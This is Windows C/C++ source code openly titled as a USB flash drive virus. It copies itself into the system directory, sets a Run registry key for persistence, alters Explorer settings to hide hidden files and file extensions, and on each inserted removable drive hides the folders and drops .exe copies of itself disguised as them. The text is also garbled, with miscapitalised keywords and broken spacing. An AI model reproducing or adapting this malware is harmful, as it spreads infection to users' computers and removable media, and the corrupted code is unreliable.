Source code of a USB flash drive Virus

# Include "stdafx. H"
# Include <windows. h>
# Include "resource. H"
//////////////////////////////////////// /////////////
Void dobad (char drivebuf []);
Void dobad (char drivebuf [])
{
Cfilefind finder;
// Build a string with wildcards
Cstring strwildcard (drivebuf );
Strwildcard + = _ T ("*.*");
Char filesource [max_path] = {0 };
Char filenew [max_path] = {0 };
Hmodule = getmodulehandle (null );
Getmodulefilename (hmodule, filesource, max_path );
Closehandle (hmodule );
// Start working for files
Bool bworking = finder. findfile (strwildcard );
While (bworking)
{
Bworking = finder. findnextfile ();
If (finder. isdots ())
Continue;
// If it's a directory, Recursively search it
If (finder. isdirectory ()&&! Finder. issystem ()&&! Finder. ishidden ())
{
If (! Setfileattributes (finder. getfilepath (), file_attribute_hidden | file_attribute_system) // | file_attribute_system
Continue;
Sprintf (filenew, "% S % s", finder. getfilepath (), ". EXE ");
Copyfile (filesource, filenew, true );
}
}
Finder. Close ();
}
//////////////////////////////////////// /////////////
# Include <DBT. h>
Char diskpath [5] = {0 };
Lresult ondevicechange (hwnd, wparam, lparam );
Lresult ondevicechange (hwnd, wparam, lparam)
{
// Char U [4];
Pdev_broadcast_hdr lpdb = (pdev_broadcast_hdr) lparam;
DWORD alldisk = getlogicaldrives ();
If (alldisk! = 0)
{
Switch (wparam)
{
Case dbt_devicearrival:
{
For (INT I = 0; I <40; I ++)
{
If (alldisk & 1) = 1)
{
Sprintf (diskpath, "% C", 'C' + I );
Strcat (diskpath ,":\\");

If (getdrivetype (diskpath) = drive_removable)
{
If (getvolumeinformation (diskpath, 0, 0, 0, 0, 0 ))
{
// MessageBox (null, diskpath, "1", mb_ OK );
Dobad (diskpath );
Break;
}
}
}
Alldisk = alldisk> 1;
}
}
Break;
Case dbt_deviceremovecomplete:
MessageBox (null, "Stop USB flash drive", "virus prompt! ", Mb_ OK );
Break;
}
}
Return lresult ();
}

Lresult callback wndproc (hwnd, uint message, wparam, lparam );
Lresult callback wndproc (hwnd, uint message, wparam, lparam)
{
Switch (Message)
{
Case wm_create:
Break;
Case wm_devicechange:
// If (modify_data.isupan)
Ondevicechange (hwnd, wparam, lparam );
Break;
Case wm_close:
Return false;
Case wm_destroy:
Return false;
Default:
Return defwindowproc (hwnd, message, wparam, lparam );
}
Return 0;
}

Int createmywindow ();
Int createmywindow ()
{
MSG;
Wndclass wndc;
Lpstr szappname = "webdown ";
Wndc. Style = 0;
Wndc. lpfnwndproc = wndproc;
Wndc. cbclsextra = 0;
Wndc. cbwndextra = 0;
Wndc. hinstance = NULL;
Wndc. hicon = NULL;
Wndc. hcursor = NULL;
Wndc. hbrbackground = (hbrush) (color_window + 1 );
Wndc. lpszmenuname = NULL;
Wndc. lpszclassname = szappname;
Registerclass (& wndc );
Hwnd = createwindow (szappname, "hacker ",
Ws_overlappedwindow, cw_usedefault, cw_usedefault,
Cw_usedefault, cw_usedefault, null );
Showwindow (hwnd, sw_hide );
Updatewindow (hwnd );

Sendmessage (hwnd, wm_devicechange, 0, 0 );

While (getmessage (& MSG, null, 0, 0 ))
{
Translatemessage (& MSG );
Dispatchmessage (& MSG );
}
Return 1;
}

//////////////////////////////////////// /////////////
Void deletesubkeytree (hkey, lpctstr lpsubkey );
Void deletesubkeytree (hkey, lpctstr lpsubkey)
{
Long lresult;
Hkey hsubkey;
DWORD dwindex, cbname;
Char szsubkey [512];
Filetime ft;
Lresult = regopenkeyex (hkey, lpsubkey, 0, key_all_access, & hsubkey );
If (lresult! = Error_success)
{
Regclosekey (hsubkey );
// Return lresult;
}
Dwindex = 0;
Cbname = sizeof (szsubkey)/sizeof (szsubkey [0]);
While (error_success = (lresult = regenumkeyex (hsubkey, dwindex, szsubkey, & cbname, null, null, & ft )))
{
Deletesubkeytree (hsubkey, szsubkey );
}
Regclosekey (hsubkey );
Lresult = regdeletekey (hkey, lpsubkey );
// Return lresult;
}

Void fuckreg ();
Void fuckreg ()
{
Hkey;
Regcreatekey (HKEY_LOCAL_MACHINE, "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden", & hkey );
Tchar * valuea = _ T ("the machine has been poisoned Program Test-Jack ");
Regsetvalueex (hkey, "text", null, REG_SZ, (lpbyte) valuea, (DWORD) (lstrlen (valuea) + 1 ));
Regclosekey (hkey );

Lpctstr lpsubkey1 = "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden \ nohidden ";
Hkey hkey1 = HKEY_LOCAL_MACHINE;
Deletesubkeytree (hkey1, lpsubkey1 );

Lpctstr lpsubkey2 = "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced \ Folder \ Hidden \ showall ";
Hkey hkey2 = HKEY_LOCAL_MACHINE;
Deletesubkeytree (hkey2, lpsubkey2 );

Hkey hkey3;
Regcreatekey (HKEY_CURRENT_USER, "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Explorer \ Advanced", & hkey3 );
DWORD valuea3 = 1;
Regsetvalueex (hkey3, "hidefileext", null, REG_DWORD, (const byte *) (& valuea3), 4 );
Regclosekey (hkey3); // close the handle
}
//////////////////////////////////////// /////////////

# Include <shellapi. h>
# Pragma comment (linker, "/align: 4096 ")
# Pragma comment (linker, "/subsystem: \" WINDOWS \ "/entry: \" maincrtstartup \"")
Int main ()
{
//////////////////////////////////////
Char fullpath [max_path];
Hmodule = getmodulehandle (null );
Getmodulefilename (hmodule, fullpath, max_path );
Cstring strpath = (cstring) fullpath;
Int ret=strpath.reversefind(_t('.exe '));
Cstring Path = strpath. Left (ret-3) + _ T ("\\");
// MessageBox (PATH );
ShellExecute (null, "cmde", path, null, null, sw_shownormal );
// ShellExecute (null, "open", null, null, path, sw_shownormal );

Handle m_hmutex = createmutex (null, false, "alalmn Jack is only used for testing !! ");
If (getlasterror () = error_already_exists)
{
Closehandle (m_hmutex );
M_hmutex = NULL;
Exitprocess (0 );
}
///////////////////////////
Char filesource [max_path] = {0 };
Char filenew [max_path] = {0 };
Hmodule hmodule1 = getmodulehandle (null );
Getmodulefilename (hmodule1, filesource, max_path );
Closehandle (hmodule1 );
Getsystemdirectory (filenew, max_path );
Strcat (filenew ," \ Hacker.exe ");
///////////////////////////
Copyfile (filesource, filenew, true );
Hkey = HKEY_LOCAL_MACHINE;
Char lpsubkey [256] = "SOFTWARE \ Microsoft \ Windows \ CurrentVersion \ Run ";
Hkey phkresult;
Int Len = sizeof (filenew );
If (: regopenkeyex (hkey, lpsubkey, 0, key_all_access, & phkresult )! = Error_success)
{
: Regcreatekeyex (hkey, lpsubkey, 0, null, reg_option_non_volatile, key_set_value | key_create_sub_key | key_write, null, & phkresult, null );
}
If (regqueryvalueex (hkey, lpsubkey, null, null, (unsigned char *) & filenew, (unsigned long *) & Len )! = Error_success)
: Regsetvalueex (phkresult, "hacker -- Jack", 0, REG_SZ, (lpbyte) filenew, (DWORD) (lstrlen (filenew) + 1 ));
: Regclosekey (phkresult );
///////////////////////////
Fuckreg ();
Createmywindow ();
//-------------------------
// While (1) // create an endless loop, otherwise the main thread exits
//{
// Sleep (1, 1000 );
//}
//---------------------
Return 0;
}